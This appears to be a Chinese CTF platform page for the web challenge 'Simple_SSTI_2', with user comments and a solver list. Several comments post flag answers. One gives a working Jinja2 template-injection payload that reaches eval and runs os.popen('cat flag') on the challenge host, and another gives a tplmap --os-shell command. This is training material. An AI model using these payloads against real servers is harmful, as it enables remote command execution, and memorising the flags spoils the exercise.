Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15815
提  示:
描  述:
Simple_SSTI_2
评论
dialog007 2年前

flag{5797b77f958c0d81a37ff4a0128bbe50}

回复 0

saber2k 2年前

flag{8b37299e6a976863ae79c8c173ce7cd1}

回复 0

18096199839 2年前

http://114.67.175.224:12412/?flag={{().__class__.__base__.__subclasses__[177].__init__.__globals__[%27__builtins__%27][%27eval%27](%27__import__(%22os%22).popen(%22cat%20flag%22).read()%27)}} 直接构造

回复 1

tigernolion 2年前

./tplmap.py -u http://114.67.175.224:14305/?flag=123 --os-shell

回复 0

Adaneo 2年前

有点像命令执行

回复 0

Timeover 2年前

全靠大佬

回复 1

342300 2年前

回复 1

zhangcoolcheng 2年前

还是不知道原理

回复 2
ttxs25830 2年前

后端代码中会把flag参数里的字符串用模板引擎渲染出来,这个方法就是让模板引擎以为我们的字符串其实是要执行的代码,大概是这个原理

回复 7

lmzq 2年前

用模板注入 直接用popen类调用os.open()执行系统命令

回复 0

奋斗中的小宸宸 3年前

https://blog.csdn.net/qq_51096893/article/details/122020518

回复 3
hehe呵呵 2年前

payload不行啊,链接直接被重置掉了

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

YameMres 攻破了该题 1天前
yixcjy 攻破了该题 3天前
DURUI 攻破了该题 3天前
零号酒仓 攻破了该题 3天前
besty2k 攻破了该题 4天前
zttyzz 攻破了该题 4天前
12334 攻破了该题 4天前
PY222 攻破了该题 4天前
魔刀千刃 攻破了该题 4天前
我是CTF大王 攻破了该题 4天前
16671766779 攻破了该题 5天前
海宝宝哈哈 攻破了该题 5天前
遇见遇见 攻破了该题 5天前
th0528 攻破了该题 6天前
/ 攻破了该题 6天前
15195388189 攻破了该题 6天前
18185185996 攻破了该题 11天前
KKsama 攻破了该题 11天前
zhuguangsen 攻破了该题 11天前
5013230204 攻破了该题 13天前
问题反馈